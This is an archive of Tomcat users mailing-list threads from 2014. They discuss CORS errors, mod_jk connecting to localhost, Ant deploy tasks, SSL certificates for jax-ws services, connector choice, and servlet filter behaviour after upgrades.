From: demablo...@gmail.com Date: Sat, 26 Apr 2014 13:56:43 +0200 Subject: Re: CORS issue with Tomcat and Android Webview To: users@tomcat.apache.org 2014-04-26 13:16 GMT+02:00 Martin Gainty mgai...@hotmail.com: Date: Sat, 26 Apr 2014 11:43:05 +0530 Subject: Re: CORS issue with Tomcat and Android Webview From: ankising...@gmail.com To: users@tomcat.apache.org On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian tere...@tmbsw.comwrote: On 4/24/2014 11:16 PM, Ankit Singhal wrote: Hi I did more research on this and figure out the issue.If you see the headers from Android and look into Origin Header. Origin: file:// Tomcat CORS filter tries to validate the URI in Origin header and considers file:// as an invalid URI and returns back 403. I have applied accept-origin*/accept-origin params. So shouldn't CORS filter honor this ? I agree that Client also has the problem , but still server should also allow... Hi: I'm watching this flowchart https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png and I wonder if Tomcat 7 checks if the request received belongs to the right type. I mean, if browser sends a simple request ( eg. POST + application/xml content-type header ) WC3 spec says that request should be a preflight request , does Tomcat check this case ? MGyou will need to set the Access-Allow-Origin to * and Content-Type to application/xml public void doPost(HttpServletRequest req, HttpServletResponse resp) { resp.addHeader(Access-Control-Allow-Origin, *); resp.addHeader(Content-Type, application/xml); resp.getWriter().append(csvString); }MG Regards - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
Date: Sat, 5 Apr 2014 06:57:23 -0400 From: dcker...@verizon.net To: users@tomcat.apache.org Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work ... but if the server is a *nix implementation, the better diag tool might be dig. And yes, I would not expect the address 0.0.0.0 on a client to connect to the localhost. That is a special case address meaning local network. If anything, it would be sending packets out the NIC card, not via loopback. 0.0.0.0 means all IPv4 interfaces available and only applies for binding a server socket. You can never connect to 0.0.0.0 as a client. Chris - It actually has a different meaning based on use. For binding to a socket in the local IP stack, it means what you say. In the routing table, it means the default route. In firewalls/routers, it probably means something completely different. When used as a destination address, it means what I said. How the IP stack/hardware deals with it is dependent on the implementation. The RFCs specify that it should be treated the same as the broadcast address, but local network only, and not routable. That may be for received packets only, as I've seen other references that it should never be used on-the-wire, unless as the source address in protocols like DHCP. In any event, definitely not expect the 0.0.0.0. address to get any response, either local host or otherwise. For the OP's specific problem, s/he need to see how localhost is resolving. Most systems define it in the local hosts file, either /etc/hosts (*nix) or c:\Windows\system32\etc\hosts. Not sure for other systems. Jeff Make that C:\Windows\system32\drivers\etc\hosts. I did a test and it appeared that ping didn't rely on the entry being there, but it could have been a cached result. Way back in the day when I had the misfortune to use Windows regularly for stuff like this, I seem to recall that almost nothing short of a reboot would cause the hosts file to be re-read. - -chris If I remember correctly, the Windows resolver cache may be cleared from a command prompt with ipconfig and that should include entries from the hosts file. Seems like I may have had to restart the browser though to see any changes to the hosts file. ipconfig /flushdns MG ipconfig/flushdns *should* flush the ips and the dns entries to test use a browser that doesnt cache dns entries (like firefox) go to address bar about:config network.dnsCacheExpirationGracePeriod http://kb.mozillazine.org/Network.dnsCacheExpiration hth, Martin MG - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
From: jeffrey.jan...@polydyne.com To: users@tomcat.apache.org Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work Date: Fri, 4 Apr 2014 17:33:08 + -Original Message- From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com] Sent: Friday, April 04, 2014 12:10 PM To: 'Tomcat Users List' Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work -Original Message- From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com] Sent: Friday, April 04, 2014 12:04 PM To: 'Tomcat Users List' Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work -Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Friday, April 04, 2014 10:23 AM To: Tomcat Users List Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Jeffrey, On 4/4/14, 10:50 AM, Jeffrey Janner wrote: -Original Message- From: André Warnier [mailto:aw@ice- sa.com] Sent: Thursday, April 03, 2014 5:27 PM To: Tomcat Users List Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work Christopher Schultz wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 André, On 4/3/14, 3:34 PM, André Warnier wrote: Alten, Jessica-Aileen wrote: -Ursprüngliche Nachricht- Von: André Warnier [mailto:a...@ice-sa.com] Gesendet: Donnerstag, 3. April 2014 15:36 An: Tomcat Users List Betreff: Re: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work Alten, Jessica-Aileen wrote: A bit guessing here : You have : worker.ajp13w.host=localhost and jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed (errno=49) is localhost == 0.0.0.0 ? From the point of view of mod_jk/isapi, should it not be 127.0.0.1 ? Your answer points to the right direction. 0.0.0.0 means: any configured IPv4-Address on this computer, see http://serverfault.com/questions/78048/whats-the- difference- betwee n- ip -addre ss-0-0-0-0-and-127-0-0-1 In principle this is ok at first. The Ajp13 Connector was configured in server.xml to listen at any IPv4 address on port 8009 - which is the default setting. But the connector can't find any suitable address. The problem is: The new Tomcat-Connector can't parse worker.ajp13w.host=localhost, instead localhost must be replaced with 127.0.0.1, this works! In my eyes this is a big fat bug, because most documentation on workers use localhost. localhost is actually the default for the host connection directive. The new worker directive prefer_ipv6 doesn't change this behavior. Hi. Can you please really check this ? Open a command window on that server, and do ping localhost. It should tell you what it understands by localhost. Copy and paste the result here : ping localhost Ping wird ausgeführt für xyz.uv.local [127.0.0.1] mit 32 Bytes Daten: Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128 Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128 Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128 Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128 Ping-Statistik für 127.0.0.1: Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust), Ca. Zeitangaben in Millisek.: Minimum = 0ms, Maximum = 0ms, Mittelwert = 0ms That /is/ bizarre. As far as I know, to resolve hostnames in its configuration, mod_jk/isapi is using the OS's resolver library, the same as the one ping should be using. On the other hand, you say that if you have worker.ajp13w.host=localhost it doesn't work (mod_jk cannot connect to tomcat), but when you change this to worker.ajp13w.host=127.0.0.1 then it works fine. Ok, another check in a command window (and I assume that you open this command window *on the server itself* where mod_jk and Tomcat are running, right ?) test : 1) telnet localhost 8009 2) telnet 127.0.0.1 8009 Any difference between these 2 cases ? If not, then indeed it looks like a mod_jk/isapi_redirect 1.2.39 problem. In any case, you cannot connect to 0.0.0.0, as this log line would suggest : jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed Could this be an interaction between IPv4 and IPv6? Try: C: nslookup localhost You might get only 127.0.0.1 or you might also get :: (or something equivalent).
RE: How to deploy Java application into Tomcat in Linux
From: randhir.si...@sterlite.com Date: Tue, 1 Apr 2014 10:43:28 +0530 Subject: How to deploy Java application into Tomcat in Linux To: users@tomcat.apache.org Hi, As per my understanding, the steps to deploy a Java application on Tomcat (5.X/6.X) in Linux would be as follows: 1) Install Tomcat on Linux 2) Add a host entry in $TOMCAT_HOME/conf with the syntax like- - Host name=xxx.co.in debug=0 appBase=/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool unpackWARs=false autoDeploy=false MGUnfortunately that Host designation wont work.. try Host name=www.tomcatexpert.com appBase=webapps unpackWARs=true autoDeploy=false MG Aliasreports.fion.co.in/Alias Context path= docBase=/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool debug=0 reloadable=false crossContext=false / The above code would assign the host name to access the URL, gives the location of the web application pointed out by appBase context path. 3) Start Tomcat. Please let me know if the steps above are correct and also please let me know in detail if the steps are not correct. -- *STL Disclaimer:* The content of this message may be legally privileged and confidential and are for the use of the intended recipient(s) only. It should not be read, copied and used by anyone other than the intended recipient(s). If you have received this message in error, please immediately notify the sender, preserve its confidentiality and delete it. Before opening any attachments please check them for viruses and defects. No employee or agent is authorised to conclude any binding agreement on behalf of Sterlite Technologies Limited with another party by email without express written confirmation by authorised person. Visit us at www.sterlitetechnologies.com Please consider environment before printing this email !
RE: catalina-ant reload task doesn't work
$/CATALINA_HOME/conf/server.xml autoDeploy=true https://tomcat.apache.org/tomcat-6.0-doc/config/host.html ? Martin _ Date: Fri, 28 Mar 2014 18:21:42 -0700 Subject: catalina-ant reload task doesn't work From: catph...@catphive.net To: users@tomcat.apache.org Using the tasks from the example ant script at: http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt I have can deploy and undeploy from ant. However, the reload task doesn't seem to do anything. I make changes to java and html files, run ant reload which triggers the reload task. Ant reports success. I browse to the site and my changes aren't reflected. undeploy followed by deploy works. Am I not understanding what reload is supposed to do, or is there a different task that makes more sense to use?
RE: NoClassDefFoundError using catalina ant deploy task
no bugs..just ...'undocumented features' glad you found the solution! Martin __ Date: Fri, 28 Mar 2014 17:51:08 -0700 Subject: Re: NoClassDefFoundError using catalina ant deploy task From: catph...@catphive.net To: users@tomcat.apache.org I investigated more and found the solution... It seems like a doc bug in that the tutorial doesn't tell you everything you need to do to get deploy to work. tomcat-util.jar needs to be placed in ~/.ant/lib. The tutorial says to place catalina-ant.jar there, but doesn't mention tomcat-util.jar. The user needs the manager-script role for deploy to succeed. The tutorial doesn't mention this. Overall the appdev tutorial is pretty problematic because it doesn't really include a complete example and seems to have kind of random organization. On Fri, Mar 28, 2014 at 4:41 PM, Brendan Miller catph...@catphive.netwrote: I was going through the tomcat docs and trying to use the default build.xml file provided by the appdev tutorial to deploy my war to tomcat. Example build.xml: http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt However, when I use the deploy task I always get a java.lang.NoClassDefFoundError: org/apache/tomcat/util/codec/binary/Base64 error. I've copied the relevant code here: https://gist.github.com/catphive/9845270 I've verified that tomcat-util.jar, which contains Base64.cass, is on the path, compile.classpath, passed to taskdef. I'm just trying to do a basic tomcat tutorial, and getting this deploy task to run is hanging me up. Any ideas what could be doing wrong? Are these deploy tasks broken somehow? Brendan
RE: SSO
When you say Linux I assume you are implementing Red Hat Enterprise Linux SSO https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Deployment_Guide/sso-ov.html Martin __ Please do not alter or disrupt this email transmission...Thank You From: yossi.br...@sap.com To: users@tomcat.apache.org Subject: SSO Date: Sun, 23 Mar 2014 07:37:41 + Hi to all , I am trying to install SSO on Linux machine with Tomcat in order to working with Jenkins without the needed to login, any idea ? Thanks a lot , Yos
RE: help with setting up proxy
From: hardikvaish...@gmail.com Date: Sat, 22 Mar 2014 22:32:11 -0400 Subject: Re: help with setting up proxy To: users@tomcat.apache.org Here is the example of what I am trying to do. JBoss Webserver Private IP : 192.168.10.100 JBoss Webserver Public IP 172.x.x.x Server connected to Jboss: 192.168.10.101 192.168.10.102 If I am on the Jboss machine I can access 192.168.10.101\abc\test.html If I am outside the network its not possible to access URL 192.168.10.101\abc\test.html To solve the problem I have PAC file as a proxy for my browser which redirect all request for 192.168.10.101 address to apache httpd proxy server which sits inside the (192.168.x.x) network. Upto this point everything works OK. Request comes to Apache httpd server but it is not able to pass the url as is to 192.168.10.101\abc\test.html and return the response back to the client. MG192.168.10.101 is only known to the machines obtaining their IP from that DHCP router MGThe router dynamically assigns 192.168.x.x to that machine at that point in time MGNo machine outside that routers network would ever know about those dynamic IPs MGThis is a Network issue... please contact your Net Admin thanks, -Hardik On Sat, Mar 22, 2014 at 2:04 PM, Hardik Vaishnav hardikvaish...@gmail.comwrote: Sorry my bad. I am talking about Apache httpd server. On Mar 22, 2014 12:29 PM, Hassan Schroeder hassan.schroe...@gmail.com wrote: On Sat, Mar 22, 2014 at 9:18 AM, Hardik Vaishnav hardikvaish...@gmail.com wrote: I am trying to configure Apache Tomcat as a proxy server. I hope I am not confusing everybody. I think perhaps you are confusing yourself. Tomcat has no intrinsic proxy server capability to configure. Are you thinking of the Apache httpd server? -- Hassan Schroeder hassan.schroe...@gmail.com http://about.me/hassanschroeder twitter: @hassan - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: Effects of turning off sendFile in the NIO connector
Date: Sat, 22 Mar 2014 14:24:01 -0400 Subject: Effects of turning off sendFile in the NIO connector From: tomcat.ran...@gmail.com To: users@tomcat.apache.org What effect would setting useSendfile=false have on a web application using the NIO connector? I'm asking because I may want to use gzip compression in the connector. The docs state: *There is a tradeoff between using compression (saving your bandwidth) and using the sendfile feature (saving your CPU cycles). If the connector supports the sendfile feature, e.g. the NIO connector, using sendfile will take precedence over compression. The symptoms will be that static files greater that 48 Kb will be sent uncompressed.* It's trivial that adding compression uses CPU cycles, but does that imply that turning sendFile off even without enabling compression would increase CPU cycles? It's worth mentioning that the site serves a large (8mg) SWF file. I believe that was one of the pluses of NIO/sendFile, that it was good with sending large files under heavy traffic? MGwhen you enable sendfile support with request attr org.apache.tomcat.sendfile.support = true MGYou will need to set these 3 header attributes org.apache.tomcat.sendfile.filename: Canonical filename of the file which will be sent as a String org.apache.tomcat.sendfile.start: Start offset as a Long org.apache.tomcat.sendfile.end: End offset as a Long MGhtitps://tomcat.apache.org/tomcat-6.0-doc/aio.html MGCompression: MGset compression=on @ Connector MGhttps://tomcat.apache.org/tomcat-7.0-doc/config/http.html MGI did not read that TC cannot use sendfile with any compressed Stream? MGcan you show us the URL? MGThanks We also only really need compression on XML data, the site has minimal HTML, SWF's don't really benefit from gzip and some binary data we send back and forth is already compressed. I could manually implement compression on XML at the application level and within the SWF, if turning off sendFile will have negative consequences. Tomcat 7.0.42 RHEL6 ~4T outbound traffic/day Best, John
RE: jax-ws and tomcat 7 with ssl
i assume they copied OptionalPrefixcacerts $JAVA_HOME\jre\lib\security? make sure validation dates are correct for Certificate a self-signed cert is designed to work on the machine where you created the cert only *CN* to implement a cert that will work on FQDN with correct dates you will need a REAL cert from verisign / thawte / DigiCert Fixing PKIX Errors: http://www.mkyong.com/webservices/jax-ws/suncertpathbuilderexception-unable-to-find-valid-certification-path-to-requested-target/ Making Self-Signed Certs http://torlanglo.wordpress.com/2008/05/03/how-to-create-a-ssl-certificate-with-custom-domain-name-for-use-in-iis7-web-sites/ Get your 'REAL CERTS' here http://safire.net/support/verisign.html Martin Date: Tue, 18 Mar 2014 17:58:32 -0400 From: mariacristinasi...@sourcecable.net To: users@tomcat.apache.org Subject: jax-ws and tomcat 7 with ssl Hi, I developed a web service using jax-ws and configured Tomcat to support SSL connection. Here are my steps: ** Step 1 - Generate a self-signed server certificate Use JDK 1.7 keytool: keytool -genkey -alias trackerdev -keypass changeit -storepass changeit -keystore D:\Tomcat7\htdkeystore\trackerdev.ks –ext san=ip:xx.x.x.xxx Is CN=xx.x.x.xxx, OU=it, O=companynamehere, L=citynamehere, ST=provincenamehere, C=ca correct? [no]: yes ** Step 2 – Configure Tomcat to support SSL connection On the dev server: Modify TOMCAT_HOME\conf\server.xml by adding the following block where keystoreFile and keystorePass are set to values from the previous step: Connector port=8444 protocol=HTTP/1.1 SSLEnabled=true maxThreads=150 scheme=https secure=true clientAuth=false sslProtocol=TLS keystoreFile=htdkeystore/trackerdev.ks keystorePass=changeit / ** Step 3 - Export the generated server certificate to a certificate file On the dev server: keytool –export -alias trackerdev -storepass changeit –file D:\Tomcat7\htdkeystore\serverdev.cer -keystore D:\Tomcat7\htdkeystore\trackerdev.ks ** Step 4 - Import the server certificate into the truststore file (Open an administrator cmd window and hit Shift, Ctrl, Enter) Copy serverdev.cer from the dev server and on the local machine: keytool –import –v –trustcacerts –alias trackerdev –file C:\fromdevserver\serverdev.cer –keystore C:\Program Files\Java\jdk1.7.0_51\jre\lib\security\cacerts -keypass changeit -storepass changeit Trust this certificate? [no]: yes ** Step 5 – Modify webapps’s web.xml Add the following: listener listener-class com.sun.xml.ws.transport.http.servlet.WSServletContextListener /listener-class /listener servlet servlet-nametracker/servlet-name servlet-class com.sun.xml.ws.transport.http.servlet.WSServlet /servlet-class /servlet servlet-mapping servlet-nametracker/servlet-name url-pattern/tracker/url-pattern /servlet-mapping security-constraint web-resource-collection web-resource-namesecuredapp/web-resource-name url-pattern/tracker/url-pattern /web-resource-collection user-data-constraint transport-guaranteeCONFIDENTIAL/transport-guarantee /user-data-constraint /security-constraint ** MY QUESTION IS THIS: I tested the web service using https and it worked for me. I provided another team with my server certificate so that they could add it to their truststore file but I have no idea if they did or not. All I know is that they got an error loading the wsdl. The exception they got was: Error loading [https://xx.x.x.xxx:8444/appname/tracker?wsdl] org.apache.xmlbeans.XmlException: javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target They claim that the certificate is not properly signed. Well, I don't know. It is a self-signed certificate. Any ideas would help! - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
Seema- You've asked about 10 different questions on 10 different aberrancies on your upgrade zip up the whole project up and stick it on driveway or any other free site That way anyone building/running the code on TC7.0.52 can at least observe same behaviour you are experiencing Martin -- From: seema...@hotmail.com To: users@tomcat.apache.org Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52 Date: Tue, 18 Mar 2014 14:10:19 + Any update on this Chris Schultz or anyone else? I know the images I added to the email didn't show up, so if you want me to email them directly to you, I can. Could really do with help on this, as it is not something I know much about. Thanks Seema From: seema...@hotmail.com To: users@tomcat.apache.org Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52 Date: Fri, 14 Mar 2014 15:15:04 + Date: Fri, 14 Mar 2014 08:36:08 -0400 From: ch...@christopherschultz.net To: users@tomcat.apache.org Subject: Re: HttpServletRequest Tomcat 5.5.29 to 7.0.52 -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Seema, On 3/14/14, 7:53 AM, Seema Patel wrote: I have upgraded my tomcat (5.5.29 to 7.0.52) and Java (1.5 to 1.7) for my struts servlet jsp application. I have also removed all JCIFS authentication from the WEB-INF/web.xml file and have tried to do BASIC authentication through Tomcat and the AD (it authenticates me, but not sure if I've missed anything out, as I've never done this before). One question at a time, please ;) Sorry for the off-loading of multiple questions :-) I have a doFilter function in my code, which contains httpServletRequest.getServletPath() call. In the Tomcat 5.5.29 Java 1.5 version, this will work, as when I print httpServletRequest.getServletPath() i get the following: P1_00.do P5_0_0.do P5_0_1.do But in Tomcat 7.0.52 Java 1.7 I get the following from httpServletRequest.getServletPath() call: P1_00.do P5_0_0.do P5_0_1.do includes/tab_defaultsettings.jsp includes/P1_00.do How are you printing this? Do you just have a Filter that wraps everything and dumps-out the ServletPath for every request? Can you post the code for that Filter as well as the filter and filter-mapping configuration you have in web.xml? I'm just doing a System.out.println() in the doFilter function in the RequestFilter class to show which page it is. The doFilter function is: public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { if (request instanceof HttpServletRequest) { final HttpServletRequest httpRequest = (HttpServletRequest)request; final Object userBeanObject = httpRequest.getSession().getAttribute(GenConstants.LOGGED_IN_USER_BEAN); final String pageName = httpRequest.getServletPath().replaceAll(/,); System.out.println(Request Page = + httpRequest.getServletPath()); if (unsecuredPages.contains(pageName)) { // don't need any protection chain.doFilter(request, response); } else if (!(userBeanObject instanceof UserBean)) { // no user bean in session do need one, invalidate session and redirect to login if (httpRequest.getSession(false) != null) { httpRequest.getSession().invalidate(); } ((HttpServletResponse)response).sendRedirect(logonPage); } else { final UserBean user = (UserBean) userBeanObject; MapString,LogicalOperation permissions = (MapString,LogicalOperation)context.getAttribute(GenConstants.PERMISSIONS_MAP); if(permissions == null) { PermissionsUtil.setupPermissions(context); permissions = (MapString,LogicalOperation)context.getAttribute(GenConstants.PERMISSIONS_MAP); } final LogicalOperation requiredOp = permissions.get(pageName.replaceAll(\\.do,)); if (user.isOperationAllowed(requiredOp)) { chain.doFilter(request, response); } else { if (httpRequest.getSession(false) != null) { httpRequest.getSession().invalidate(); } ((HttpServletResponse)response).sendRedirect(logonPage); } } } } To give you a better idea of what was in the web.xml, here is what's been taken out: filter filter-nameNtlmHttpFilter/filter-name filter-classjcifs.http.NtlmHttpFilter/filter-class init-param param-namejcifs.smb.client.soTimeout/param-name param-value3/param-value /init-param !-- always needed for preauthentication / SMB signatures -- init-param param-namejcifs.smb.client.domain/param-name param-valueXXX.LOCAL/param-value /init-param !-- SMB message signing requires a valid existing login -- init-param param-namejcifs.smb.client.username/param-name param-valueusername/param-value /init-param init-param param-namejcifs.smb.client.password/param-name param-valuepassword/param-value /init-param !-- Set the logging level -- init-param
RE: tomcat-native libraries
Date: Tue, 18 Mar 2014 19:57:57 +0530 Subject: Re: tomcat-native libraries From: randeep...@gmail.com To: users@tomcat.apache.org On Tue, Mar 18, 2014 at 7:29 PM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Randeep, On 3/18/14, 9:46 AM, Randeep wrote: On Tue, Mar 18, 2014 at 7:13 PM, Christopher Schultz ch...@christopherschultz.net wrote: John, On 3/17/14, 9:52 AM, John Smith wrote: Installing the native library will make a difference. Whether the difference is large enough to notice depends very much on your application. If you want to improve your application's performance I suspect your time would be better spent with a profiler to see where the bottlenecks are in your application. Mark +1 I had the native APR installed and ended up removing it in favor of keeping things simple. The NIO connector often recommended by Chris S. and others works very well. It's also a big safer in that obscure problems rarely bring-down the JVM, whereas a bug in tcnative/apr/openssl can kill the entire JVM without warning. Using APR really only makes sense if you are using Tomcat directly as a web server that uses SSL, since there is a measurable difference between OpenSSL's performance and JSSE's performance. -chris Thank you Chris, In that case, I'm not going to use it. I was using httpd as front end to server ssl certificates. Now load balancer is handling it. Stick with the NIO connector. If you are using AJP to connect httpd to Tomcat, you will probably be better off with the BIO connector, actually. It's simpler and basically bug-free given its maturity. Since there is a 1:1 map between Tomcat and httpd connections, there's no really good reason to switch to another connector IMO. - -chris Chris, I'm not sure about what kind of connector I'm using. This ismy configuration. httpd-2.2.3-65.el5.centos + tomcat-connectors-1.2.28-src + tomcat-connectors-1.2.28-src [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/mod_jk.conf JkWorkersFile /etc/httpd/conf.d/workers.properties JkLogFile /var/log/httpd/mod_jk.log JkLogLevel info JkLogStampFormat [%a %b %d %H:%M:%S %Y] JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories JkRequestLogFormat %w %V %T JkMount /* worker1 JkShmFile /etc/httpd/logs/jk-runtime-status [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/workers.properties workers.tomcat_home=/usr/share/apache-tomcat-6.0.37/ workers.java_home=/usr/java/default ps=/ worker.list=worker1 worker.default.port=8009 worker.default.host=localhost worker.default.type=ajp13 Is there anyway to check which type is this NIO or BIO? MGcheck the Connector in server.xml -BEGIN PGP SIGNATURE- Version: GnuPG v1 Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJTKFFMAAoJEBzwKT+lPKRYS74P/1UkDakuqDz6LyLUaBeTzcXl R/2eliStJMAE146C6QpE2YBV4w2dyh/xEnndRmbE3R3NE9cD3yUom+VO7x1OOgL9 ODM8Ry5AWXBXqhjx2k4hjRM43Hza6Z+GJYb9RutdLj71GCU4fEFrTX23sCAkUKbx nzCGMG4robj7l6TDSdK6uZpmisV7LGBWsUIjkJnTX5AvxFhU5QsFOISE/osFAy6I ukw840t57BCJ0mlIV/EBORa+0BCO+lz7ZBk+kkwHG5mSXFapTqNcySKfYGEzkVmD 8OHBJehmkqHfBuqgiavIwpLZ3wZnLcrJpsMzdxGUG1wuuFVtr1aRZ+h/L+/diUnE B37m9fOuwd3RfY7uhJXATiYo8oW5nB/EOIYuKDsfgMi7eY/NBg2r8Rw7MHYLJUuN lXtHJTyyBLQcgw5twnTbdA5MPbdgjZ2A2uw6sKCf5/vNyZBkGky+6Fush9cMRIL/ zdmNyJCCP9jzBOltFl0NNW/bpI1UKpMk8bScJZvAC3JNvMt1FCu3e4rQmqJXlzwG yBIQeqoIHpogLbF5CxGcOUJGV80O0o5vq+N2qt7TArqOHEifGhroVAQPEOtYmI/K x7u4Xv+VPg19YmRS6PJCYkYw082vFbmanXjt7BgmUWNs3WD1ooe66bmWPzKX3btA HcuHDQFgyaGQu0z55MYP =Vqt8 -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org -- Randeep Mob: +919447831699[kerala] Mob: +919880050349[B'lore] I blog here: http://www.randeeppr.me/ Follow me Here: http://twitter.com/Randeeppr Poke me here! http://www.facebook.com/Randeeppr A little Linux Help http://www.linuxhelp.in/ Work profile: http://in.linkedin.com/in/randeeppr
RE: filter question
you'll need to pass your modified response to service method of servlet which is *in* the filterChain ApplicationFilterChain::internalDoFilter(ServletRequest request, ServletResponse response) throws IOException, ServletException { servlet.service(request, response); ... } Martin Date: Thu, 13 Mar 2014 17:51:59 -0700 Subject: filter question From: catph...@catphive.net To: users@tomcat.apache.org I have a filter with doFilter method like this: public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest req = (HttpServletRequest) request; HttpServletResponse resp = (HttpServletResponse) response; resp.setHeader(Cache-Control, must-revalidate, max-age=0, post-check=0, pre-check=0); chain.doFilter(request, response); } This sets the header. However, if I set the header *after* chain.doFilter, the header is not set. Why is this? public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest req = (HttpServletRequest) request; HttpServletResponse resp = (HttpServletResponse) response; chain.doFilter(request, response); resp.setHeader(Cache-Control, must-revalidate, max-age=0, post-check=0, pre-check=0); } Programmatically I can see the header is null. Has the content already been sent to the web browser after chain.doFilter? If so, is there a way to delay sending data to the browser? I need to inspect the status code in the response before setting my header (to prevent 404's from being cached). Thanks, Brendan Miller
RE: Stream closed- IOException exception
Date: Thu, 6 Mar 2014 11:13:22 +0530 Subject: Re: Stream closed- IOException exception From: prashantkada...@gmail.com To: users@tomcat.apache.org On Wed, Mar 5, 2014 at 9:34 PM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Prashant, On 3/5/14, 9:14 AM, Prashant Kadam wrote: On Wed, Mar 5, 2014 at 7:11 PM, Prashant Kadam prashantkada...@gmail.comwrote: On Mon, Mar 3, 2014 at 10:55 PM, Christopher Schultz ch...@christopherschultz.net wrote: Prashant, On 3/3/14, 6:04 AM, Prashant Kadam wrote: please help ... I have removed whitespaces by adding jsp-config jsp-property-group url-pattern*.jsp/url-pattern trim-directive-whitespacestrue/trim-directive-whitespaces /jsp-property-group /jsp-config but still i am facing same error. This may or may not do anything. I tried to increase the buffer size also as, %@ page buffer=800kb autoFlush=false % but still same error Hm. With a huge buffer, the only reason the response would have been committed is if a flush() was being called somewhere. You said you gutted the struts actions, but it's possible that somewhere, Struts is internally flushing the buffer. (That would surprise me, honestly). Are you sure there are no errors occurring anywhere? Often, an error will cause the response to be committed. BTW you probably never want to use autoFlush=false unless you are watching the buffer very carefully. For debugging, it's fine, but you certainly don't want to do that on a regular basis. stuck on this issue for more than 2 weeks now and need to close it ASAP please help. Remember that this is a community made up of volunteers. This problem / ticket is *yours* and not ours to be solved ASAP. Everybody's issues need to be solved ASAP, of course. If you want something done ASAP and you can't do it yourself, then you'll have to pay someone else to do it. Any help/ pointer would be highly appreciated. one more things, we are using struts version 1 and tiles 2.2. as struts1 doesn't work with tiles2, we have used struts-tiles2-1.4.0-SNAPSHOT.jar, can this create any problem, but this combination work with tomcat version below 7.0.37 and giving issues from version 7.0.39. Can anybody please tell me what are the changes in between these two versions which can produce this errror ?? You could take a look at the Changelog for version 7.0.39 (or .38) to see if anything looks probable. I recommend using a debugger as Konstantin suggests and trap the condition. You'll be able to unwind the stack to see what code is causing the response to be committed. hi Thanks for your reply. I started debugging the code and found some pointers but not able to fully identify the root cause. What I found is, In TilesRequestProcessor class protected void doForward( String uri, HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { if (response.isCommitted()) { this.doInclude(uri, request, response); } else { super.doForward(uri, request, response); } } with version 7.0.39, somewhere org.apache.jasper.runtime.ServletResponseWrapperInclude.*isCommited* is setting to false, causing forward but response is already commited and throws IO Exception. with version 7.0.37, particularly for this request this flag sets to true and it works. any pointers on this ? how can I find from where this is setting to false ? I found the class *org.apache.coyote.Response* ... where this flag is being set, public void setCommitted(boolean v) { this.commited = v; } its default value is false and in my case it does not come here when I debug, so remains false. But when I use 7.0.37, this method gets called and it sets this flag to true. Is there any changes in tomcat which can cause this behavior ? I'm not sure. What did the stack trace look like when setCommitted(true) was called? That's more important than knowing /that/ it was called... hi Chris thanks for reply May be I failed to explain properly my understanding, I will explain the scenario once again I am including one jsp in another jsp, there are different behaviors for 2 tomcat versions as below 1. case in 7.0.37 - setCommitted(true) was called and thus in tiles code (pasted below), it includes the jsp and works fine with no exception thus no stack strace TilesRequestProcessor class protected void doForward( String uri, HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { if (response.isCommitted()) { 